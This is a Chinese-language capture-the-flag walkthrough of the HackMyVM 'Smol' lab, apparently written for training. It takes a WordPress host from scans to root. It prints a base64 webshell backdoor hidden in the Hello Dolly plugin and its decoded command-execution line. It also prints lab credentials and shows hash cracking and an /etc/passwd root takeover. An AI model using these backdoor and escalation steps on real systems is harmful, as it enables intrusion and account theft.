hackmyvm-Smol
信息收集
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:10 (Unknown: locally administered)
192.168.56.100 08:00:27:eb:ec:71 (Unknown)
192.168.56.110 08:00:27:6a:b5:9b (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.200 seconds (116.36 hosts/sec). 3 responded
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.110
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-03 03:20 EST
Nmap scan report for www.smol.hmv (192.168.56.110)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: AnotherCTF
|_http-generator: WordPress 6.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:6A:B5:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
渗透
访问80端口会重定向到www.smol.hmv
配置一下hosts文件
[外链图片转存中…(img-wLhJUZGs-1742267017316)]
┌──(root㉿LAPTOP-40PQI58C)-[~]
└─# wpscan --url http://www.smol.hmv/ -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://www.smol.hmv/ [192.168.56.110]
[+] Started: Mon Mar 3 17:03:30 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://www.smol.hmv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.3 identified (Insecure, released on 2023-08-08).
| Found By: Rss Generator (Passive Detection)
| - http://www.smol.hmv/index.php/feed/, <generator>https://wordpress.org/?v=6.3</generator>
| - http://www.smol.hmv/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.3</generator>
[+] WordPress theme in use: popularfx
| Location: http://www.smol.hmv/wp-content/themes/popularfx/
| Last Updated: 2024-11-19T00:00:00.000Z
| Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
| [!] The version is out of date, the latest version is 1.2.6
| Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
| Style Name: PopularFX
| Style URI: https://popularfx.com
| Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
| Author: Pagelayer
| Author URI: https://pagelayer.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:01:14 <==================================> (109325 / 109325) 100.00% Time: 00:01:14
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://www.smol.hmv/wp-content/plugins/akismet/
| Last Updated: 2025-02-14T18:49:00.000Z
| Readme: http://www.smol.hmv/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/akismet/, status: 200
|
| Version: 5.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt
[+] jsmol2wp
| Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
| Latest Version: 1.07 (up to date)
| Last Updated: 2018-03-09T10:28:00.000Z
| Readme: http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/, status: 200
|
| Version: 1.07 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] think
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] wp
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Jose Mario Llado Marti
| Found By: Rss Generator (Passive Detection)
[+] wordpress user
| Found By: Rss Generator (Passive Detection)
[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] diego
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gege
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] xavi
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 3 17:04:55 2025
[+] Requests Done: 109398
[+] Cached Requests: 10
[+] Data Sent: 29.374 MB
[+] Data Received: 14.995 MB
[+] Memory used: 489.035 MB
[+] Elapsed time: 00:01:25
根据wpscan 得出的结果我们可以知道
靶机网站的WordPress装有 jsmol2wp这个插件。
这个插件版本号<=1.07有一个CVE
同时还发现网站有admin wpuser think gege diego xavi
这几个用户
我使用文件读取漏洞去读取wp-config.php文件在里面找到了一个数据库账号和密码
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
WordPress网站中同样有一个wpuser用户
然后我就尝试使用这个密码来登录WordPress
[外链图片转存中…(img-hTCGgT6z-1742267017318)]
登录进来以后发现wpuser貌似只是一个普通的用户
没有我想要的编辑插件/主题的源代码的功能
然后暂时我简单的测试了一下文件上传功能没有什么进展之后,我就在这个方向上就没有什么思路了
我又在即将目光放在jsmol2wp的漏洞上
我了解到这个版本的jsmol2wp还存在一个SSRF漏洞
于是我就尝试了一下拿Gopher协议来攻击MySQL数据库从而给网站写木马
很遗憾我没有成功
后来我在一个Webmaster Tasks!!的贴子上发现了一点信息
[外链图片转存中…(img-z4X8owby-1742267017318)]
说要排查存在后面的插件Hello Dolly
┌──(root㉿kali)-[~kali/Desktop]
└─# dirsearch -u "http://www.smol.hmv/" -w SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 13370
Output File: /home/kali/Desktop/reports/http_www.smol.hmv/__25-03-03_04-29-49.txt
Target: http://www.smol.hmv/
[04:29:49] Starting:
[04:29:52] 200 - 0B - /wp-content/plugins/akismet/
[04:30:15] 500 - 0B - /wp-content/plugins/hello.php
[04:30:15] 500 - 0B - /wp-content/plugins/hello.php/
我又对网站目录FUZZ了一遍
发现了hello.php的存在
我再次使用jsmol2wp的漏洞
读取了hello.php的源码
?php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/
function hello_dolly_get_lyric() {
/** These are the lyrics to Hello Dolly */
$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";
// Here we split it into lines.
$lyrics = explode( "\n", $lyrics );
// And then randomly choose a line.
return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}
// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
$chosen = hello_dolly_get_lyric();
$lang = '';
if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
$lang = ' lang="en"';
}
printf(
'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
$lang,
$chosen
);
}
// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );
// We need some CSS to position the paragraph.
function dolly_css() {
echo "
<style type='text/css'>
#dolly {
float: right;
padding: 5px 10px;
margin: 0;
font-size: 12px;
line-height: 1.6666;
}
.rtl #dolly {
float: left;
}
.block-editor-page #dolly {
display: none;
}
@media screen and (max-width: 782px) {
#dolly,
.rtl #dolly {
float: none;
padding-left: 0;
padding-right: 0;
}
}
</style>
";
}
add_action( 'admin_head', 'dolly_css' );
在hello_dolly()函数中后一个后门
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
base64解码之后就是
if (isset($_GET["cmd"])) { system($_GET["cmd"]); }
但是他的触发条件是add_action( 'admin_notices', 'hello_dolly' );
当触发admin_notices的时候就会执行这个函数
我们使用 wpuser用户进入后台的时候刚好有一个admin_notices
[外链图片转存中…(img-lZEAE9fX-1742267017318)]
尝试在这个页面执行命令
执行成功
[外链图片转存中…(img-by9cVx0a-1742267017318)]
然后我上传了一个shell.php文件用于反弹shell
一个sql.php用来从数据库中查询出所用的用户名与密码
[外链图片转存中…(img-TUHyCg1F-1742267017319)]
┌──(root㉿LAPTOP-40PQI58C)-[~/Desktop]
└─# john passwd --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (?)
hero_gege@hotmail.com (?)
2g 0:00:19:33 DONE (2025-03-02 21:39) 0.001704g/s 12226p/s 56527c/s 56527C/s !!!@@@!!!..*7¡Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
破解出了diego与gege的密码
同时这个密码也是diego的ssh密码
www-data@smol:/var/www/wordpress/wp-admin$ whoami
whoami
www-data
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
whoami
diego
user‘s flag就在diego的home目录下
我尝试了使用密码登录ssh
但是diego gege think xavi
这四个用户都被禁止远程用密码登录
我在diego的home目录下面写了一个ssh 公钥然后成功用ssh登录进去了
┌──(kali㉿kali)-[~]
└─$ ssh diego@192.168.56.110
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 03 Mar 2025 05:48:15 PM UTC
System load: 0.01 Processes: 194
Usage of /: 57.2% of 9.75GB Users logged in: 0
Memory usage: 32% IPv4 address for enp0s17: 192.168.56.110
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 2 21:58:36 2025 from 192.168.56.103
diego@smol:~$ whoami
diego
diego@smol:~$
diego gege think xavi这个四个用户都在一个组里面 可以互相访问各自的home目录
diego@smol:/home$ ls -al
total 24
drwxr-xr-x 6 root root 4096 Aug 16 2023 .
drwxr-xr-x 18 root root 4096 Mar 29 2024 ..
drwxr-x--- 4 diego internal 4096 Mar 2 22:19 diego
drwxr-x--- 7 gege internal 4096 Mar 2 22:45 gege
drwxr-x--- 5 think internal 4096 Jan 12 2024 think
drwxr-x--- 2 xavi internal 4096 Aug 18 2023 xavi
diego@smol:/home$
think用户的home目录有一个.ssh目录
diego@smol:/home/think$ ls -al
total 32
drwxr-x--- 5 think internal 4096 Jan 12 2024 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think 220 Jun 2 2023 .bash_logout
-rw-r--r-- 1 think think 3771 Jun 2 2023 .bashrc
drwx------ 2 think think 4096 Jan 12 2024 .cache
drwx------ 3 think think 4096 Aug 18 2023 .gnupg
-rw-r--r-- 1 think think 807 Jun 2 2023 .profile
drwxr-xr-x 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
diego@smol:/home/think$ ls -al .ssh/
total 20
drwxr-xr-x 2 think think 4096 Jun 21 2023 .
drwxr-x--- 5 think internal 4096 Jan 12 2024 ..
-rwxr-xr-x 1 think think 572 Jun 21 2023 authorized_keys
-rwxr-xr-x 1 think think 2602 Jun 21 2023 id_rsa
-rwxr-xr-x 1 think think 572 Jun 21 2023 id_rsa.pub
diego@smol:/home/think$
diego用户对他有r权限
然后我就读取了think用户的私钥
然后ssh远程登录think
┌──(root㉿kali)-[/home/kali]
└─# ssh -i id_rsa think@192.168.56.110
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 03 Mar 2025 05:52:14 PM UTC
System load: 0.02 Processes: 203
Usage of /: 57.2% of 9.75GB Users logged in: 1
Memory usage: 33% IPv4 address for enp0s17: 192.168.56.110
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Mar 3 15:54:04 2025 from 192.168.56.103
think@smol:~$
成功登录但是think 执行sudo -l的时候需要输入密码
我不知道think的密码
当我没有什么思路的时候我无意间使用think的身份执行了一次su gege的命令
发现无需输入密码成功切换到gege用户身份
think@smol:~$ su gege
gege@smol:/home/think$ whoami
gege
gege@smol:/home/think$
gege用户的home目录下有一个wordpress.old.zip文件
但是解压它需要密码
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ unzip wordpress.old.zip
Archive: wordpress.old.zip
creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password:
我复制一份到到我的kali上面 使用john破解
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john wordpress --show
wordpress.old.zip:hero_gege@hotmail.com::wordpress.old.zip:wordpress.old/wp-content/plugins/akismet/index.php, wordpress.old/wp-content/index.php, wordpress.old/wp-content/plugins/index.php, wordpress.old/wp-content/themes/index.php, wordpress.old/wp-includes/blocks/spacer/style.min.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.min.css, wordpress.old/wp-includes/blocks/spacer/style.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.css:wordpress.old.zip
1 password hash cracked, 0 left
将其解压之后。
在它的wp-config文件中发现了xavi的密码
[外链图片转存中…(img-Mb1gKInf-1742267017319)]
提权
su切换到xavi用户后,执行sudo -l
gege@smol:~/wordpress.old$ su xavi
Password:
xavi@smol:/home/gege/wordpress.old$ whoami
xavi
xavi@smol:/home/gege/wordpress.old$ sudo -l
[sudo] password for xavi:
Matching Defaults entries for xavi on smol:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User xavi may run the following commands on smol:
(ALL : ALL) /usr/bin/vi /etc/passwd
xavi@smol:/home/gege/wordpress.old$
可以编辑/etc/passwd
执行openssl passwd -1 -salt Yliken 123456生成一段hasg
然后将其写入passwd
[外链图片转存中…(img-T4i3Cbto-1742267017320)]
然后su Yliken
xavi@smol:/home/gege/wordpress.old$ su Yliken
Password:
root@smol:/home/gege/wordpress.old$ whoami
root
root@smol:/home/gege/wordpress.old$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/gege/wordpress.old$
/etc/passwd
执行openssl passwd -1 -salt Yliken 123456生成一段hasg
然后将其写入passwd
然后su Yliken
xavi@smol:/home/gege/wordpress.old$ su Yliken
Password:
root@smol:/home/gege/wordpress.old$ whoami
root
root@smol:/home/gege/wordpress.old$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/gege/wordpress.old$